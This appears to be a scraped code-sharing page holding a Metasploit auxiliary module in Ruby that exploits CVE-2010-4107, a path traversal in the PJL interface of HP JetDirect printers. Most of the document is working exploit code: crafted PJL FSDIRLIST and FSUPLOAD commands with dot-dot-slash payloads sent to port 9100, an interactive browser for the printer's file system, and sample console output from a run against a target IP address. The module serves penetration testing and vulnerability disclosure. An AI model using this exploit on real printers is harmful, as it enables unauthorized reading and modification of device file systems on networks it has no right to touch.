扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 |
# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal # Date: Aug 7, 2011 # Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> # Software Link: http://www.hp.com # Version: All # Tested on: HP LaserJet Pxxxx Series ## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # Sample Output: # # # msf auxiliary(hp_printer_pjl_traversal) > show options # # Module options (auxiliary/admin/hp_printer_pjl_traversal): # #Name Current SettingRequiredDescription #---- ---------------------------------- #INTERACTIVEfalsenoEnter interactive mode [msfconsole Only] #RHOST202.138.16.21yes The target address #RPATH/yes The remote filesystem path to browse or read #RPORT9100 yes The target port # # # msf auxiliary(hp_printer_pjl_traversal) > run # # [*] cd / ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # bin TYPE=DIR # usr TYPE=DIR # etc TYPE=DIR # hpmnt TYPE=DIR # hp TYPE=DIR # lib TYPE=DIR # dev TYPE=DIR # init TYPE=FILE SIZE=9016 # .profile TYPE=FILE SIZE=834 # tmp TYPE=DIR # # # msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true # INTERACTIVE => true # msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp # RPATH => /hp # msf auxiliary(hp_printer_pjl_traversal) > run # # [*] Entering interactive mode ... # [*] cd /hp ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # app TYPE=DIR # lib TYPE=DIR # bin TYPE=DIR # webServer TYPE=DIR # images TYPE=DIR # DemoPage TYPE=DIR # loc TYPE=DIR # AsianFonts TYPE=DIR # data TYPE=DIR # etc TYPE=DIR # lrt TYPE=DIR # # [*] Current RPATH: /hp # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > webServer/config # [*] cd /hp/webServer/config ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # soe.xml TYPE=FILE SIZE=23615 # version.6 TYPE=FILE SIZE=45 # # # [*] Current RPATH: /hp/webServer/config # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > !r version.6 # [*] cat /hp/webServer/config/version.6 ... # [+] Server returned the following response: # # WebServer directory version.Do not delete! # # # [*] Current RPATH: /hp/webServer/config # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > quit # [*] Exited ... Have fun with your Printer! # [*] Auxiliary module execution completed require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name'=> 'HP JetDirect PJL Interface Universal Path Traversal', 'Version' => '$Revision: 1 $', 'Description' => %q{ This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100. With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified. }, 'Author'=> [ 'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2010-4107' ], [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ], [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ], [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ], [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ], [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ], [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ] ], 'DisclosureDate' => '2010-11-15')) register_options( [ OptString.new('RPATH', [ true, "The remote filesystem path to browse or read", "/" ] ), OptBool.new('INTERACTIVE', [ false, "Enter interactive mode [msfconsole Only]", false ] ), Opt::RPORT(9100) ],self.class) end def run mode = datastore['INTERACTIVE'] if mode == true set_interactive(datastore['RPATH']) else set_onetime(datastore['RPATH']) end end def set_interactive(spath) action = 'DIR' rpath =spath rfpath = '' tmp_path = '' tmp_file = '' cur_dir = '/' print_status("Entering interactive mode") stop = false set_onetime(rpath) until stop == true print_status("Current RPATH: #{rpath}") print_status("-> 'quit' to exit") print_status("->'/' to return to file system root") print_status("->'..' to move up to one directory") print_status("->'!r FILE' to read FILE on current directory\r\n") print_status("Enter RPATH:") print("$ > ") tmp_path = gets.chomp.to_s if tmp_path =~ /\.\./ && rpath.length > 2 old_path = rpath new_path = rpath[0,rpath.rindex('/')] if new_path != nil rpath = new_path else rpath = '/' end rpath = '/' if rpath.length == 0 print_status("Change to one up directory: #{rpath}") elsif tmp_path =~ /\!r\s/ cur_dir = rpath tmp_file = tmp_path.gsub('!r ','') rfpath = cur_dir + '/' + tmp_file rfpath = rfpath.gsub('//','/') action = 'FILE' elsif tmp_path == '/' rpath = '/' elsif rpath != '/' rpath = rpath + '/' << tmp_path else rpath = rpath<< tmp_path end if rpath =~ /quit/ stop= true rpath = '/' print_status("Exited ... Have fun with your Printer!") else rpath = rpath.gsub('//','/') if action == 'FILE' set_onetime(rfpath,action) cur_dir = rpath else set_onetime(rpath,action) end action = 'DIR' end end end def set_onetime(spath,saction =datastore['ACTION']) rpathx= spath action = saction rpathx = '/' if rpathx =~ /\/quit/ connect dir_cmd = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a" file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a" if action =~ /DIR/ r_cmd = dir_cmd.sub("[REPLACE]",rpathx) print_status("cd #{rpathx} ...") else r_cmd = file_cmd.sub("[REPLACE]",rpathx) print_status("cat #{rpathx} ...") end recv = sock.put(r_cmd) res = sock.get(-1,1) if (!res) print_error("ERROR in receiving data!\r\n") else if res.to_s =~ /ERROR/ print_error("Operation Not Permitted or File/DIR Not Found!\r\n") disconnect return end resx = res.to_s[res.index("\r\n")+1,res.length] print_good("Server returned the following response:\r\n#{resx}") end disconnect end end |
体验盒子
